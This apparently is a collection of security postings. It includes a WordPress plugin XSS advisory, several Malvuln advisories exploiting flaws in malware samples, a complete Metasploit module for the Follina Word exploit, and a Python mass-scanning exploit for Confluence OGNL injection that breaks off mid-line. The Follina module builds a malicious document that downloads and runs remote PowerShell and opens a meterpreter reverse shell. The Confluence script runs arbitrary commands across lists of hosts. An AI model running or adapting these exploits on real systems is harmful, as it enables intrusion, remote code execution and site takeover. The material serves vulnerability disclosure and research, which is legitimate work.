<pre><code>Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Download Manager<br /><br />Plugin Slug: download-manager<br /><br />Plugin Developer: codename065<br /><br />Affected Versions: <= 3.2.42<br /><br />CVE ID: CVE-2022-1985<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Rafie Muhammad (Yeraisci)<br /><br />Fully Patched Version: 3.2.43<br /><br />Download Manager is a file and document management plugin to help manage and control file downloads with various file download controls to restrict unauthorized file access. The plugin also provides a complete solution to sell digital products from WordPress sites, including checkout functionality to complete an order. One feature of the plugin is the ability to use a shortcode to embed files and other assets in a page or post. This function was found to be vulnerable to reflected Cross-Site Scripting.<br /><br />Secure coding practices would include checks to sanitize the input received by the page, and escaping that code on the output to ensure that only approved inputs and outputs are presented. Unfortunately, insufficient input sanitization and output escaping on the $_REQUEST[‘frameid’] parameter found in the ~/src/Package/views/shortcode-iframe.php file of the Download Manager plugin made it possible for an attacker to run arbitrary code in a victim’s browser by getting them to click on a specially crafted URL. This is due to the fact that the ‘frameid’ parameter was echoed to the page without sufficient user input validation.<br /><br />Without proper sanitization and escaping in place on user-supplied inputs, JavaScript can be used to manipulate the page. Even an unsophisticated attacker could hijack the form and use it to trick a site administrator into unknowingly disclosing sensitive information, or to collect cookie values.<br /><br />More specialized attackers would use this capability to gain administrator access or add a backdoor and take over the site. If the attacker gains this access, they would have access to the same information the administrator would be able to access, including user details and customer information.<br /><br />In the case of Download Manager, customer information and access to digital products would both be at risk. If an attacker were able to trick an administrator into clicking a link that has been designed to send session cookies to the attacker, add a malicious administrator account, or implement a backdoor on the website, the attacker would also have free reign in the administrator panel, giving them the ability to modify checkout settings and even add fake products to the website.<br /><br />Conclusion<br /><br />In today’s post, we discussed a reflected Cross-Site Scripting (XSS) vulnerability in Download Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 3.2.43 as of this writing, as soon as possible.<br /><br />All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::Powershell<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Office Word MSDTJS',<br /> 'Description' => %q{<br /> This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template<br /> feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.<br /> },<br /> 'References' => [<br /> ['CVE', '2022-30190'],<br /> ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],<br /> ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],<br /> ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],<br /> ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],<br /> ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],<br /> ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']<br /> ],<br /> 'Author' => [<br /> 'nao sec', # Original disclosure.<br /> 'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity<br /> ],<br /> 'DisclosureDate' => '2022-05-29',<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'DefaultOptions' => {<br /> 'DisablePayloadHandler' => false,<br /> 'FILENAME' => 'msf.docx',<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',<br /> 'SRVHOST' => Rex::Socket.source_address('1.2.3.4')<br /> },<br /> 'Targets' => [<br /> [ 'Microsoft Office Word', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'AKA' => ['Follina'],<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [UNRELIABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),<br /> OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])<br /> ])<br /> end<br /><br /> def get_file_in_docx(fname)<br /> i = @docx.find_index { |item| item[:fname] == fname }<br /><br /> unless i<br /> fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")<br /> end<br /><br /> @docx.fetch(i)[:data]<br /> end<br /><br /> def get_template_path<br /> datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')<br /> end<br /><br /> def generate_html<br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"<br /><br /> dummy = ''<br /> (1..random_int(61, 100)).each do |_n|<br /> dummy += '//' + rand_text_alpha(100) + "\n"<br /> end<br /><br /> cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")<br /><br /> js_content = "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\";"<br /> if datastore['OBFUSCATE']<br /> print_status('Obfuscate JavaScript content')<br /><br /> js_content = Rex::Exploitation::JSObfu.new js_content<br /> js_content = js_content.obfuscate(memory_sensitive: false)<br /> end<br /><br /> html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'<br /> html += "\n#{dummy}\n#{js_content}\n"<br /> html += '</script></body></html>'<br /><br /> html<br /> end<br /><br /> def inject_docx<br /> document_xml = get_file_in_docx('word/document.xml')<br /> unless document_xml<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')<br /> end<br /><br /> document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')<br /> unless document_xml_rels<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')<br /> end<br /><br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"<br /> @docx.each do |entry|<br /> case entry[:fname]<br /> when 'word/_rels/document.xml.rels'<br /> entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")<br /> end<br /> end<br /> end<br /><br /> def normalize_uri(*strs)<br /> new_str = strs * '/'<br /><br /> new_str = new_str.gsub!('//', '/') while new_str.index('//')<br /><br /> # makes sure there's a starting slash<br /> unless new_str.start_with?('/')<br /> new_str = '/' + new_str<br /> end<br /><br /> new_str<br /> end<br /><br /> def on_request_uri(cli, request)<br /> header_html = {<br /> 'Access-Control-Allow-Origin' => '*',<br /> 'Access-Control-Allow-Methods' => 'GET, POST',<br /> 'Cache-Control' => 'no-store, no-cache, must-revalidate',<br /> 'Content-Type' => 'text/html; charset=UTF-8'<br /> }<br /><br /> if request.method.eql? 'HEAD'<br /> send_response(cli, '', header_html)<br /> elsif request.method.eql? 'OPTIONS'<br /> response = create_response(501, 'Unsupported Method')<br /> response['Content-Type'] = 'text/html'<br /> response.body = ''<br /><br /> cli.send_response(response)<br /> elsif request.raw_uri.to_s.end_with? '.html'<br /> print_status('Sending HTML Payload')<br /><br /> send_response_html(cli, generate_html, header_html)<br /> elsif request.raw_uri.to_s.end_with? '.ps1'<br /> print_status('Sending PowerShell Payload')<br /><br /> send_response(cli, @payload_data, header_html)<br /> end<br /> end<br /><br /> def pack_docx<br /> @docx.each do |entry|<br /> if entry[:data].is_a?(Nokogiri::XML::Document)<br /> entry[:data] = entry[:data].to_s<br /> end<br /> end<br /><br /> Msf::Util::EXE.to_zip(@docx)<br /> end<br /><br /> def primer<br /> print_status('Generating a malicious docx file')<br /><br /> @proto = (datastore['SSL'] ? 'https' : 'http')<br /><br /> template_path = get_template_path<br /> unless File.extname(template_path).downcase.end_with?('.docx')<br /> fail_with(Failure::BadConfig, 'Template is not a docx file!')<br /> end<br /><br /> print_status("Using template '#{template_path}'")<br /> @docx = unpack_docx(template_path)<br /><br /> print_status('Injecting payload in docx document')<br /> inject_docx<br /><br /> print_status("Finalizing docx '#{datastore['FILENAME']}'")<br /> file_create(pack_docx)<br /><br /> @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)<br /><br /> super<br /> end<br /><br /> def random_int(min, max)<br /> rand(max - min) + min<br /> end<br /><br /> def unpack_docx(template_path)<br /> document = []<br /><br /> Zip::File.open(template_path) do |entries|<br /> entries.each do |entry|<br /> if entry.name.downcase.end_with?('.xml', '.rels')<br /> content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?<br /> elsif entry.file?<br /> content = entry.get_input_stream.read<br /> end<br /><br /> vprint_status("Parsing item from template: #{entry.name}")<br /><br /> document << { fname: entry.name, data: content }<br /> end<br /> end<br /><br /> document<br /> end<br /><br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/40acf109fa9621eae6930ef18f804909.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cabrotor.10.d<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 1243. Attackers who can reach infected systems can issue commands made up of single characters E.g. sending 'Q' will terminate the backdoor. Executing wrong or unknown commands will result in the following server response "Comando desconocido".<br />Family: Cabrotor<br />Type: PE32<br />MD5: 40acf109fa9621eae6930ef18f804909<br />Vuln ID: MVID-2022-0612<br />Disclosure: 06/06/2022<br /><br />Exploit/PoC:<br />C:\>python -c "print('Q')" | nc64.exe x.x.x.x 1243<br />CaBroNaToR Server 1.0<br />Conexion estableciada el dia 5/2/2022 a las 02:47:35 AM<br /><br />Fin de conexion - 02:47:35 AM<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/dedad693898bba0e4964e6c9a749d380.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom.Haron<br />Vulnerability: Code Execution<br />Description: Haron looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malwares own flaw will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Haron<br />Type: PE32<br />MD5: dedad693898bba0e4964e6c9a749d380<br />Vuln ID: MVID-2022-0609<br />Disclosure: 06/06/2022 <br /><br />Exploit/PoC:<br />1) Compile the following C code as "VERSION.dll"<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "VERSION.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit Haron<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c VERSION.c -m32<br />//gcc -shared -o VERSION.dll VERSION.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Haron\nPWNED By MALVULN", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/bffc519fbaf2d119bd307cd22368cdc7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Proxy.Win32.Symbab.o<br />Vulnerability: Heap Corruption<br />Description: The malware listens on TCP port 8080. Attackers who can reach an infected system can send a corrupt HTTP request for the "redirecturl" parameter causing a heap corruption.<br />Family: Symbab<br />Type: PE32<br />MD5: bffc519fbaf2d119bd307cd22368cdc7<br />Vuln ID: MVID-2022-0610<br />Disclosure: 06/06/2022<br /><br />Memory Dump:<br />(670.1e5c): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=049fff48 edx=00000290 esi=00000003 edi=00000003<br />eip=7770ed3c esp=049fb564 ebp=049fb6f4 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:007> .ecxr<br />eax=00000290 ebx=000002d8 ecx=049fff48 edx=00000290 esi=00450000 edi=00000000<br />eip=776df2e1 esp=049fbea0 ebp=049fbee0 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />ntdll!RtlFreeHeap+0xa1:<br />776df2e1 8078ff05 cmp byte ptr [eax-1],5 ds:002b:0000028f=??<br /><br />0:007> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e<br />*** ERROR: Module load completed but symbols could not be loaded for Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e<br /><br />FAULTING_IP: <br />ntdll!RtlFreeHeap+a1<br />776df2e1 8078ff05 cmp byte ptr [eax-1],5<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 776df2e1 (ntdll!RtlFreeHeap+0x000000a1)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 0000028f<br />Attempt to read from address 0000028f<br /><br />PROCESS_NAME: Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 0000028f<br /><br />READ_ADDRESS: 0000028f <br /><br />FOLLOWUP_IP: <br />Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c<br />004a260c 83c404 add esp,4<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00001e5c<br /><br />BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ<br /><br />PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument<br /><br />DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument<br /><br />LAST_CONTROL_TRANSFER: from 744d7065 to 776df2e1<br /><br />STACK_TEXT: <br />049fbee0 744d7065 00450000 00000000 00000290 ntdll!RtlFreeHeap+0xa1<br />049fbf2c 004a260c 00000290 049fff68 004a434a msvcrt!free+0x65<br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />049fbf38 004a434a 049fff48 50545448 312e312f Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x260c<br />049fff68 004a43d7 00000290 00000290 00000004 Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x434a<br />049fff80 77408654 000002d8 77408630 42500cba Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+0x43d7<br />049fff94 77704a77 000002d8 37e18a47 00000000 kernel32!BaseThreadInitThunk+0x24<br />049fffdc 77704a47 ffffffff 77729eca 00000000 ntdll!__RtlUserThreadStart+0x2f<br />049fffec 00000000 004a438c 000002d8 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />STACK_COMMAND: !heap ; ~7s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: 2<br /><br />SYMBOL_NAME: Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7<br /><br />IMAGE_NAME: Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 4168069f<br /><br />FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_c0000005_Trojan-Proxy.Win32.Symbab.o.bffc519fbaf2d119bd307cd22368cdc7.e!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_invalid_argument_NULL_CLASS_PTR_DEREFERENCE_INVALID_POINTER_READ_Trojan_Proxy_Win32_Symbab_o_bffc519fbaf2d119bd307cd22368cdc7+260c<br /><br />Followup: MachineOwner<br /><br /><br />Exploit/PoC:<br />curl "http://192.168.18.125:8080/?redirecturl=http://0x41414141" -v<br /><br />Connected to 192.168.18.125 (192.168.18.125) port 8080 (#0)<br />GET /?redirecturl=http://0x41414141 HTTP/1.1<br />Host: 192.168.18.125:8080<br />User-Agent: curl/7.47.1<br />Accept: */*<br /><br />HTTP 1.0, assume close after body<br />HTTP/1.0 400 Bad Request<br />Server: ProxyServer/0.0.1<br />Mime-Version: 1.0<br />Date: Thu, 01 Jan 1970 00:00:00 GMT<br />Content-Type: text/html<br />Content-Length: 24<br />Expires: Thu, 01 Jan 1970 00:00:00 GMT<br />X-Squid-Error: ERR_INVALID_URL 0<br />X-Cache: MISS from www.rambler.ru<br />Connection: close<br /><br />Unsupported protocol<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/e0f2bee25dd103d92e91e895e313ec34.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Banker.Win32.Banbra.cyt<br />Vulnerability: Insecure Permissions <br />Description: The malware writes a batch script ".bat" file to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Banbra<br />Type: PE32<br />MD5: e0f2bee25dd103d92e91e895e313ec34<br />Vuln ID: MVID-2022-0611<br />Disclosure: 06/06/2022<br /><br />Exploit/PoC:<br />C:\>cacls autoexec.bat<br />C:\autoexec.bat BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>type autoexec.bat<br />@echo off<br />SET princix=del<br />SET pasta1=c:\windows\downlo~1\gb*.*<br />SET pasta2=c:\windows\downlo~1\*.g??<br />SET pasta3=c:\windows\downlo~1\g*.*<br />SET pasta4=c:\arquiv~1\GbPlugin\g*.*<br />SET pasta5=c:\arquiv~1\GbPlugin\b*.*<br />SET pasta6=c:\arquiv~1\GbPlugin\c*.*<br />SET pasta55=c:\arquiv~1\GbPlugin\u*.*<br />SET pasta7=c:\windows\downlo~1\Ab*.*<br />SET pasta8=c:\windows\downlo~1\b*.*<br />SET pasta9=c:\windows\downlo~1\Ab*.*<br />SET pasta10=c:\progra~1\GbPlugin\g*.*<br />SET pasta11=c:\progra~1\GbPlugin\b*.*<br />SET pasta12=c:\progra~1\GbPlugin\c*.*<br />SET pasta56=c:\progra~1\GbPlugin\u*.*<br />SET pasta13=C:\progra~1\Scpad\s*.*<br />SET pasta14=c:\arquiv~1\Scpad\s*.*<br />SET pasta15=C:\WINDOWS\system32\scpsssh*.*<br />%princix% %pasta1%<br />%princix% %pasta2%<br />%princix% %pasta3%<br />%princix% %pasta4%<br />%princix% %pasta5%<br />%princix% %pasta6%<br />%princix% %pasta7%<br />%princix% %pasta8%<br />%princix% %pasta9%<br />%princix% %pasta10%<br />%princix% %pasta11%<br />%princix% %pasta12%<br />%princix% %pasta13%<br />%princix% %pasta14%<br />%princix% %pasta15%<br />%princix% %pasta55%<br />%princix% %pasta56%<br /><br />C:\><br />C:\>dir autoexec.bat<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />05/24/2022 02:26 AM 1,028 autoexec.bat<br /> 1 File(s) 1,028 bytes<br /> 0 Dir(s) 24,498,929,664 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source:<br />https://malvuln.com/advisory/ef1e59148c9a902ae5454760aaab73fe.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Banker.Win32.Banker.agzg<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a PE file to c drive granting change (C)<br />permissions to the authenticated user group. Standard users can rename the<br />executable dropped by the malware to disable it or replace it with their<br />own executable. Then wait for a privileged user to logon to the infected<br />machine to potentially escalate privileges.<br />Family: Banker<br />Type: PE32<br />MD5: ef1e59148c9a902ae5454760aaab73fe<br />Vuln ID: MVID-2022-0608<br />Disclosure: 06/06/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls tuto.exe<br />C:\tuto.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir tuto.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />05/04/2022 02:56 AM 14,336 tuto.exe<br /> 1 File(s) 14,336 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied<br />"as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory,<br />provided that it is not altered except by reformatting it, and that due<br />credit is given. Permission is explicitly given for insertion in<br />vulnerability databases and similar, provided that due credit is given to<br />the author. The author is not responsible for any misuse of the information<br />contained herein and accepts no responsibility for any damage caused by the<br />use or misuse of this information. The author prohibits any malicious use<br />of security related information or exploits by the author or elsewhere. Do<br />not attempt to download Malware samples. The author of this website takes<br />no responsibility for any kind of damages occurring from improper Malware<br />handling or the downloading of ANY Malware mentioned on this website or<br />elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection<br /># Google Dork: N/A<br /># Date: 06/006/2022<br /># Exploit Author: h3v0x<br /># Vendor Homepage: https://www.atlassian.com/<br /># Software Link: https://www.atlassian.com/software/confluence/download-archives<br /># Version: All < 7.4.17 versions before 7.18.1<br /># Tested on: -<br /># CVE : CVE-2022-26134<br /># https://github.com/h3v0x/CVE-2022-26134<br /><br />import sys<br />import requests<br />import optparse<br />import multiprocessing<br /><br />from requests.packages import urllib3<br />from requests.exceptions import MissingSchema, InvalidURL<br />urllib3.disable_warnings()<br /><br />requestEngine = multiprocessing.Manager()<br />session = requests.Session()<br /><br />global paramResults<br />paramResults = requestEngine.list()<br />globals().update(locals())<br /><br />def spiderXpl(url):<br /> globals().update(locals())<br /> if not url.startswith('http'):<br /> url='http://'+url<br /> <br /> headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",<br /> "Connection": "close",<br /> "Accept-Encoding": "gzip, deflate"}<br /><br /> try:<br /> response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)<br /> if(response.status_code == 302):<br /> print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])<br /><br /> inputBuffer = str(response.headers['X-Cmd-Response'])<br /> paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')<br /> else:<br /> pass<br /><br /> except requests.exceptions.ConnectionError:<br /> print('[x] Failed to Connect: '+url)<br /> pass<br /> except multiprocessing.log_to_stderr:<br /> pass<br /> except KeyboardInterrupt:<br /> print('[!] Stoping exploit...')<br /> exit(0)<br /> except (MissingSchema, InvalidURL):<br /> pass<br /> <br /> <br />def banner():<br /> print('[-] CVE-2022-26134')<br /> print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')<br /><br /> <br />def main():<br /> banner()<br /> <br /> globals().update(locals())<br /> <br /> sys.setrecursionlimit(100000)<br /><br /> if not optionsOpt.filehosts:<br /> url = optionsOpt.url<br /> spiderXpl(url)<br /> else:<br /> f = open(optionsOpt.filehosts)<br /> urls = map(str.strip, f.readlines())<br /><br /> multiReq = multiprocessing.Pool(optionsOpt.threads_set)<br /> try:<br /> multiReq.map(spiderXpl, urls)<br /> multiReq.close()<br /> multiReq.join()<br /> except UnboundLocalError:<br /> pass<br /> except KeyboardInterrupt:<br /> exit(0)<br /><br /><br /> if optionsOpt.output:<br /> print("\n[!] Saving the output result in: %s" % optionsOpt.output)<br /><br /> with open(optionsOpt.output, 